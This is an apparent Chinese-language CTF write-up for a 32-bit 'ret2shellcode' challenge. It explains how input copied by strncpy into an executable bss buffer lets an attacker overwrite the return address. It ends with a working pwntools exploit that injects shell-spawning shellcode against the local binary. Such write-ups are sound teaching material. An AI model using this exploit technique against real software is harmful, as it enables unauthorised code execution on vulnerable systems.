1.运行程序,没有提供 system ,32位程序,基本未开保护
2.IDA中发现 strncpy() 函数将我们输入的 v4 复制到 bss 段的 buf2 处
3.经过 gdb 查看 buf2 处的代码是具有 rwx 属性的,因此我们可以构造一段 shellcode 然后执行此处的代码。
4.查看 esp 和 ebp 来计算覆盖长度
5.构造exp
#!/usr/bin/env python from pwn import * #EBP: 0xffffd158 --> 0x0 #ESP: 0xffffd0d0 --> 0xffffd0ec --> 0xf7ffd000 --> 0x26f34 sh = process('./ret2shellcode') buf_addr = 0x0804A080 payload = asm(shellcraft.sh()) #sh.recvuntil() length = 0x158 - 0xec + 4 sh.sendline(payload.ljust(length, 'a') + p32(buf_addr)) sh.interactive()
